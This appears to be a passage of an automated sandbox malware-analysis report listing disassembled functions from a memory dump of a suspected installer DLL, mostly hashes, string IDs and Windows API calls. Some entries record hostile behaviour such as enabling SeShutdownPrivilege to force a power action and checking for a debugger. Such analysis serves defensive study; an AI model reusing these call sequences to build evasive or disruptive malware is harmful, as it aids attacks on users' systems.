                              • Instruction ID: 81205c862127201348217a2fc5a38793ba41a4b4a2000ed198655fce5249c9f8
                              • Opcode Fuzzy Hash: 1ab72d555d8dcb7c7476ecf421390fc58935475e59bc13c574f6195f47cfbec3
                              • Instruction Fuzzy Hash: E1716AB0208345AFD710DF19C880B9ABBF9BF8A708F54492EF488D6751D771D988CB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: 81df74f99ed8a1077e4bc309adb61cbfd170bb3f09424893232a296e184d093c
                              • Instruction ID: 18d728207149ac5ccc03abcc05fcc3b75673dd935ace026cdcc5b740b075a51e
                              • Opcode Fuzzy Hash: 81df74f99ed8a1077e4bc309adb61cbfd170bb3f09424893232a296e184d093c
                              • Instruction Fuzzy Hash: 394247B460D3429FC728DF18C49061ABBF1AF99318F288D5EE59987B21D738D885CB53
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: de4a16657532dc75325e96081602273036a86a5559aea8d6096557b069ca1ed2
                              • Instruction ID: 5c9b905cb8d057a779c5d9291805f397f1ea2b2c6ac5af820bdbeee4236eae8e
                              • Opcode Fuzzy Hash: de4a16657532dc75325e96081602273036a86a5559aea8d6096557b069ca1ed2
                              • Instruction Fuzzy Hash: A603E031645B018FC738CF28C9D0696B7E3AFE5328759CE6DC0A64BA95DB74B44ACB40

                              Control-flow Graph (function at 6c9c5560; rendered graph and its node/edge listing omitted)
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: 4e02491ee34529bdaf0639b6145304d7aeca6d07272c480d24f72b39657587d9
                              • Instruction ID: e6d7aa0afc8af52dfdf6e405d3c061ee88f99cf708781e144a4e51045c4cf99a
                              • Opcode Fuzzy Hash: 4e02491ee34529bdaf0639b6145304d7aeca6d07272c480d24f72b39657587d9
                              • Instruction Fuzzy Hash: 9531E2B09093808FD740DF28D29872ABBF0EB9A318F509A1DF8D996250E774D589CF47

                              Control-flow Graph (function at 6c9dc1ce; rendered graph and its node/edge listing omitted)
                              APIs
                                • Part of subcall function 6C9DC421: GetConsoleCP.KERNEL32(?,6C9DB640,?), ref: 6C9DC469
                              • WriteFile.KERNEL32(?,?,6C9E4C5C,00000000,00000000,?,00000000,00000000,6C9E6026,00000000,00000000,?,00000000,6C9DB640,6C9E4C5C,00000000), ref: 6C9DC31F
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C9E4C5C,6C9DB640,00000000,?,?,?,?,00000000,?), ref: 6C9DC329
                              • __dosmaperr.LIBCMT ref: 6C9DC36E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: 91fff7c319815b43e5fc7de76e8f0bf7974e1827695bd5dc5f8676ce6daff155
                              • Instruction ID: a1226c0e613cb48a242c03cf77557eb32a2dab62ed1d8bbf7e04995b23190683
                              • Opcode Fuzzy Hash: 91fff7c319815b43e5fc7de76e8f0bf7974e1827695bd5dc5f8676ce6daff155
                              • Instruction Fuzzy Hash: 9851D571A04A0AAFDF01AFE4C840BDEBBB9FF1A318F168151E510B7A81D731F9458761

                              Control-flow Graph (function at 6c9c6100; rendered graph and its node/edge listing omitted)
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C62A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925

                              Control-flow Graph

                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C9E47CF), ref: 6C9DBEEB
                              • GetLastError.KERNEL32(?,00000000,?,6C9E47CF), ref: 6C9DBEF5
                              • __dosmaperr.LIBCMT ref: 6C9DBF20
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0

                              Control-flow Graph

                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C6024
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C6064
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              APIs
                              • GetLastError.KERNEL32(6C9F6DF0,0000000C), ref: 6C9CF4C2
                              • ExitThread.KERNEL32 ref: 6C9CF4C9
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C9E4685,?,?,00000000,?,6C9E4685,00000000,0000000C), ref: 6C9E49E4
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              Similarity
                              • API ID: _strlen
                              • String ID: g)''
                              • API String ID: 4218353326-3487984327
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 6C9C62DA
                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C9C62E6
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C9C62F4
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C9C631B
                              • NtInitiatePowerAction.NTDLL ref: 6C9C632F
                              Similarity
                              • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3256374457-3733053543
                              Similarity
                              • API ID:
                              • String ID: \j`7$\j`7$j
                              • API String ID: 0-3644614255
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA584B1
                                • Part of subcall function 6CA5993B: __EH_prolog.LIBCMT ref: 6CA59940
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Similarity
                              • API ID: H_prolog
                              • String ID: 1$`)K$h)K
                              • API String ID: 3519838083-3935664338
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA4AEF4
                                • Part of subcall function 6CA4E622: __EH_prolog.LIBCMT ref: 6CA4E627
                              Similarity
                              • API ID: H_prolog
                              • String ID: $h%K
                              • API String ID: 3519838083-1737110039
                              Similarity
                              • API ID: H_prolog
                              • String ID: $J
                              • API String ID: 3519838083-1755042146
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA26CE5
                                • Part of subcall function 6C9FCC2A: __EH_prolog.LIBCMT ref: 6C9FCC2F
                                • Part of subcall function 6C9FE6A6: __EH_prolog.LIBCMT ref: 6C9FE6AB
                                • Part of subcall function 6CA26A0E: __EH_prolog.LIBCMT ref: 6CA26A13
                                • Part of subcall function 6CA26837: __EH_prolog.LIBCMT ref: 6CA2683C
                                • Part of subcall function 6CA2A143: __EH_prolog.LIBCMT ref: 6CA2A148
                                • Part of subcall function 6CA2A143: ctype.LIBCPMT ref: 6CA2A16C
                              Similarity
                              • API ID: H_prolog$ctype
                              • String ID:
                              • API String ID: 1039218491-3916222277
                              Similarity
                              • API ID:
                              • String ID: 3J$`/J$`1J$p0J
                              • API String ID: 0-2826663437
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: W
                              • API String ID: 3519838083-655174618
                              APIs
                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C9D07E9
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C9D07F3
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C9D0800
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,6C9CF7A5,?,?,?,?), ref: 6C9CF70F
                              • TerminateProcess.KERNEL32(00000000,?,6C9CF7A5,?,?,?,?), ref: 6C9CF716
                              • ExitProcess.KERNEL32 ref: 6C9CF728
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA4489B
                                • Part of subcall function 6CA45FC9: __EH_prolog.LIBCMT ref: 6CA45FCE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @ K
                              • API String ID: 3519838083-4216449128
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: x=J
                              • API String ID: 3519838083-1497497802
                              APIs
                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C9C7E20
                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C9C8643
                                • Part of subcall function 6C9C98E9: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C9C862C,00000000,?,?,?,6C9C862C,?,6C9F555C), ref: 6C9C9949
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                              • String ID:
                              • API String ID: 915016180-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @4J$DsL
                              • API String ID: 0-2004129199
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aullrem
                              • String ID:
                              • API String ID: 3758378126-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: (SL
                              • API String ID: 0-669240678
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                              • Instruction ID: bb439fffbca4cb0627f679e74d2fd8b3ee00baa52b9e65b529b5ba0708042f5e
                              • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                              • Instruction Fuzzy Hash: EEB17075A012448FC350DF29C884284BBA2FF8532CB79969EC5948F646E337D887CBE1
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                              • Instruction ID: 39f4b7684e5c6609b32f836141c041b30dae703810a8796e00fee9e6fc3ae8b8
                              • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                              • Instruction Fuzzy Hash: 7FD1F8B1848B9A5FD394EF4DEC82A357762AF88301F4A8239DB6007753D634BB12D794
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                              • Instruction ID: ff9a457ad3cfbde2c7b4b4b38dc7268beda8af5d171849971ba8682abe2ae288
                              • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                              • Instruction Fuzzy Hash: A1B1BF31309B054BD324DF3AC9907EAB7E1AF84748F14492DC5AA87B81EF31A98DC795
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                              • Instruction ID: 93288e3eaf0bb1e64fd26b4850349c2d21813eb5dd625b6f1ab1b160ce86fde4
                              • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                              • Instruction Fuzzy Hash: 946130B63082158FD308CF99E580A96B3E5EB99321B1685BED105CB361E775DC85CB28
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                              • Instruction ID: 17d50829a3c4010058d642cd059d8c16680a90d0b6fd7da5cc4a10207f5780f4
                              • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                              • Instruction Fuzzy Hash: D8917FB281971A8BD314CF1CD88025AB7E0FB88318F49067DED99A7381D739EA55CBC5
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction ID: 3ca05999ed2ac996108670560d694f0a6229bd4d3b15b75f1a8b12555668695e
                              • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction Fuzzy Hash: C651AE72F146099FDB08CE98DD916EDBBF2EB88308F248169D011E7B81D7749B91CB80
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction ID: ae68eb1a6be50b06b07be19d964f1d3988bcbcd918a37de3a5226d01368bfc70
                              • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction Fuzzy Hash: EA3114277A840103D70CCD3BCC1679F91635BD562A70ECF396C05DEF95D52CC8524144
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
